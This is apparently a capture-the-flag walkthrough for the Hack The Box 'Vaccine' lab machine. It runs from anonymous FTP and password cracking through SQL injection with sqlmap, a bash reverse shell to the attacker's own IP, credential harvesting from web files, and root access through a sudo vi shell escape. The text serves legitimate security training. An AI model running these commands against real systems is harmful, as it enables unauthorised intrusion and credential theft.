Hacking the Vaccine machine— Hack the box

source: www.hackthebox.eu

In this article we will be hacking the Vaccine machine in Hack The Box. I assume you have a hack the box account.

Tools being used:

• Nmap
• ftp
• John the Ripper (JTR)
• Sqlmap
• Netcat

To get started, connect to the Hack the box vpn. Then spawn the machine. Lets run an nmap scan on the machine. An nmap scan will allow us to see the services running on the machine, and if there are any promising exploits.

$ nmap -sV -sC -O -F [target_ip]
PORT         STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.3
22/tcp open  ssh     OpenSSH 8.0p1 Ubuntu 6ubuntu0.1 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))

There is an ftp service running on this machine. The results also show:

21/tcp open  ftp     vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-rwxr-xr-x    1 0        0            2533 Apr 13  2021 backup.zip

We can see their is a misconfiguration in the FTP service. So any anonymous ftp login is allowed! This is great, because now we can simply connect to FTP service. We will now try to brute-force the login by finding the correct username and then not entering a password.

A list of common usernames:
root
admin
Administrator
Anonymous
user

Command to connect to FTP service:

ftp [target_ip] [port]

And we can see that if we input the name Anonymous, then we do not need to put a password!

Lets list all the files in this directory:

ftp> ls -la
drwxr-xr-x    2 0        0            4096 Apr 13  2021 .
drwxr-xr-x    2 0        0            4096 Apr 13  2021 ..
-rwxr-xr-x    1 0        0            2533 Apr 13  2021 backup.zip

There is an interesting file called backup.zip. Lets download it and see what it contains. To download this file:

get backup.zip

Quit the connection by typing:

exit

Lets try extracting this zip.

Seems like we’ll need a password for this. Luckily we can use a tool called john the ripper to hack this password protected zip. First we’ll use zip2john to generate a hash.

A hash value is a unique value that corresponds to the content of the file. Rather than identifying the contents of a file by its file name, extension, or other designation, a hash assigns a unique value to the contents of a file.
-docs.microsoft.com

Run this in your terminal:

zip2john backup.zip > hack.txt

This will create the hash and save it in a file called hack.txt. Now we need to crack this hash to get the password. We will use John the Ripper for this. In your terminal type:

john hack.txt --show

Result:

backup.zip:741852963::backup.zip:style.css, index.php:backup.zip

The password shown here is ‘741852963’, lets type that in. Lets type that in as the password, then extract it. We’ll examine the contents of index.php.

We can see that the username and password is present. However the password has been converted to a MD5 hash value, as seen by this line:

md5($_POST['password']) === "2cb42f8734ea607eefed3b70af13bbd3"

MD5 is a hashing function. We can use https://md5.gromweb.com/ to reverse this hashing function. Lets look at the result:

So the password was qwerty789. Lets try logging into the website.

We can see that the website is plain. However there is a search bar. If we type random stuff and hit enter, then nothing is shown. However if the search bar is empty and we still hit the search button then the entire table will be shown again. Lets check if it is vulnerable to SQL Injection. We will type this in the search box:

';--[Replace this with any random text]

This will convert to:

SELECT * FROM cars WHERE name ilike '';--[RANDOM TEXT THAT WE PUT IN SEARCH]

The italicized part is our search query. We have first closed the quotes to prevent anything from being searched, and we closed that command using “;”, because every SQL query ends with a “;”. Then we used “- -” to show that anything after this is a comment. It is not code and it won’t be counted as a command. Basically we are searching for nothing. The expected outcome should be the entire table shown again. If it is not shown, then its probably not vulnerable to SQL injection.

Our query worked! This proves that the website is vulnerable to sql injection. A normal website would probably show an error message. We can use the tool sqlmap, to try and see if we can get command execution via the sql injection. This means checking to see if we can run OS commands on the server. Use the command

> sqlmap -u "http://[IP OF TARGET]/dashboard.php?search=Elixir" -p search --os-shell --cookie 'PHPSESSID=Replace_this_text_with_the_value_for_PHPSESSID'

The -u parameter specifies the URL to text. We add “search=” because when we search anything on the website, all of it goes to the “search=” parameter. Look closely at the address bar on the image above. The “ — os-shell” will check to see if we can get command execution. We will also need to add our cookie information, since if we try without it, sqlmap will be redirected to the login page. To get your cookie information on Firefox simply right click, then press inspect elements. Go to storage tab and you will find your cookies there:

Lets run this command. They may ask these prompts. Type in as I have typed.

“Y” for this since we have got the database management system.

“Y” for this as well.

We know that the “search” parameter is vulnerable, based on our testing, so there is no need in searching anything else.

Result:

There we go! Now we can run os commands in the database management system. Now we can’t do much with this shell so lets get a reverse connection using netcat. First open a new terminal in your host machine and type:

> nc -lvnp 3000

This will listen for incoming connections with any ip address and port number 3000. In your sqlmap os-shell type:

os-shell> bash -c 'bash -i >& /dev/tcp/[YOUR IP]/3000 0>&1'

Make sure to use the ip address that the VPN has given you. Run ifconfig on your host machine. Then choose the ip address that only appears when you connect to the HTB vpn. Hit enter, and type “y” when it asks. Go back to your host machine, and now you should see this come up in the end:

postgres@vaccine:/var/lib/postgresql/11/main$ 

We have our reverse connection! Currently our reverse connection is a “dumb” shell. Lets upgrade this to an interactive shell, so that we can get clear our screen and do other stuff you can do in a normal terminal. Enter this in the terminal:

postgres@vaccine:/var/lib/postgresql/11/main$ python3 -c 'import pty;pty.spawn("/bin/bash")'

Then press Ctrl+Z to background this reverse connection. After that enter the following command in the terminal:

stty raw -echo; fg

The “;” allows us to run multiple commands on the same line. With stty raw -echo the inputs after the command will look weird, that is why we will execute the second command immediately. “fg” will bring back the reverse connection that we had previously backgrounded. After this type in the terminal:

export TERM=xterm

(Note: Please do not get worried if your terminal looks weird after fg. Also once you have exited this reverse connection. Enter “reset” to make your terminal look normal again.)

And now we have a proper tty shell. To test this, simply hit the clear command, and it should clear the screen.

Time to search for the user flag. Type this in the terminal:

find / -name "user.txt" 2>/dev/null

This will look for files across the target system, searching for a file “user.txt”. The 2>/dev/null prevents negative results from being shown. Result:

/var/lib/postgresql/user.txt

Type:

cat /var/lib/postgresql/user.txt

And you will have the user flag. Now time to look for the root flag. But before we can do that, we need to find password the root user. We will have to do this the hard way, manually checking each file. /var/www/html is usually the folder that contains files for the website. Lets check that out.

postgres@vaccine:/var/www$ cd /var/www/html
postgres@vaccine:/var/www$ ls
bg.png        dashboard.js   index.php    style.css
dashboard.css  dashboard.php  license.txt

The five files that are emboldened are new. Lets first checkout dashboard.php:

postgres@vaccine:/var/www$ cat dashboard.php

When you scroll down the file you will see:

We have the password! It is: “P@s5w0rd!”

Note that if the connection unexpectedly closes now, we do not have to worry as we can simply ssh into the system now, since we have a password, and an ssh port was also open on the computer. Type this in the command prompt:

$ssh postgres@[Target_IP]

Then type in the password, when it asks for it. Note that you won’t see the password being typed, but be assured it is being inputted. You should see something like this as the output:

Lets check what can we run as a this user.

postgres@vaccine:~$ sudo -l
Matching Defaults entries for postgres on vaccine:
    env_keep+="LANG LANGUAGE LINGUAS LC_* _XKB_CHARSET", env_keep+="XAPPLRESDIR XFILESEARCHPATH XUSERFILESEARCHPATH",
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin, mail_badpass
User postgres may run the following commands on vaccine:
    (ALL) /bin/vi /etc/postgresql/11/main/pg_hba.conf

So we can run this command:

/bin/vi /etc/postgresql/11/main/pg_hba.conf

As the current user. Vi is a old text editor present for unix systems. According to gtfobins.github.io there is a way to misuse this to get a shell as a root user. First lets run this command, and type the postgres password that we had found earlier, when asked for it.

It will open a file like this. Now simply run these commands. Whatever you type should show up in the bottom:

:set shell=/bin/sh
:shell

Output:

Type:

# whoami
root
# id
uid=0(root) gid=0(root) groups=0(root)

We are now a root user! Lets search for the root flag:

# find / -name root.txt 2>/dev/null
/root/root.txt
# cat /root/root.txt

We have the root flag!

And that is it for this article. I hope you enjoyed it. If you did, then please clap and share to all others who might find this useful. Thanks for reading!